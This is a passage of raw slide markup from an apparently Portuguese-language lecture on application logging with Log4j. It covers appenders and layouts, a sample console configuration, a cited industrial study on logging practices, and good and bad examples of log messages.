              <a:t>  System.exit(1);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="2999425"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.fatal("Application failed to start due to fatal error.", e);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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5" name="Shape 495"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p7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Configura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção do Log4j</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Google Shape;497;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Appender:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> destinação do arquivo de log (console, arquivo, banco de dados, servidor remoto, etc).</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Layout:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> como o Log4j deve formatar a saída</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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2" name="Shape 502"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Google Shape;503;p7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Arquivo de Configura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção do Log4j</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="8742000" cy="2955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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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&lt;Configuration&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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    &lt;Appenders&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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        &lt;Console name="Console" target="SYSTEM_OUT"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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            &lt;PatternLayout pattern="%d{yyyy-MM-dd HH:mm:ss} [%t] %-5level %logger{36} - %msg%n"/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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        &lt;/Console&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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    &lt;/Appenders&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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    &lt;Loggers&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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        &lt;Root level="info"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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            &lt;AppenderRef ref="Console"/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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        &lt;/Root&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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    &lt;/Loggers&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12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&lt;/Configuration&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Google Shape;505;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5579900" y="1177450"/>
            <a:ext cx="25968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highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
              </a:rPr>
              <a:t>output será na console</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="506" name="Google Shape;506;p76"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="505" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4328000" y="1408300"/>
            <a:ext cx="1251900" cy="655200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="2971800"/>
            <a:ext cx="41502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chemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2024-12-01 12:00:00 [main] TRACE Log4jExample </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514025" y="2471325"/>
            <a:ext cx="565200" cy="536400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p76"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="507" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5966100" y="2457000"/>
            <a:ext cx="604800" cy="514800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6536325" y="2521400"/>
            <a:ext cx="486300" cy="486300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7325400" y="2514225"/>
            <a:ext cx="543600" cy="493500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Google Shape;512;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359675" y="3515750"/>
            <a:ext cx="1216200" cy="384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lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
              </a:rPr>
              <a:t>thread name</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="513" name="Google Shape;513;p76"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="507" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570900" y="3325800"/>
            <a:ext cx="246600" cy="240000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397850" y="3371950"/>
            <a:ext cx="807000" cy="1038000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617500" y="4301650"/>
            <a:ext cx="64734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highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
              </a:rPr>
              <a:t>logar msgs "info" para cima, usando appender "Console", definido acima</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3390875" y="3551525"/>
            <a:ext cx="2611200" cy="8226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0" name="Shape 520"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="Google Shape;521;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="457200"/>
            <a:ext cx="8839202" cy="3264150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3380075" y="4019725"/>
            <a:ext cx="25080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rPr>
              <a:t>ICSE SEIP 2014</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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6" name="Shape 526"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Google Shape;527;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500550" y="378200"/>
            <a:ext cx="8249100" cy="1098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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We investigate two large industrial software systems. Both of them are online service systems deployed globally in Microsoft data centers to serve a huge number of users. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="528" name="Google Shape;528;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1723425" y="1748400"/>
            <a:ext cx="5941850" cy="1651475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Google Shape;529;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611700" y="3932350"/>
            <a:ext cx="8138100" cy="1015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rPr>
              <a:t>About half of the logged snippets are logged due to unexpected situations, while the other half are due to recording normal execution information at critical execution points</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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3" name="Shape 533"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1685875"/>
            <a:ext cx="8668800" cy="6093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3600"/>
              <a:t>Boas Práticas ao usar Log4j</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Google Shape;535;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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9" name="Shape 539"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Google Shape;540;p8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406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mensagem deve incluir contexto do evento</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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542" name="Google Shape;542;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044475" y="1877550"/>
            <a:ext cx="21600" cy="1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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1612875"/>
            <a:ext cx="7497300" cy="227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sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Good</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> {} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>placed successfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>", orderId);</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Bad</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Order placed successfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
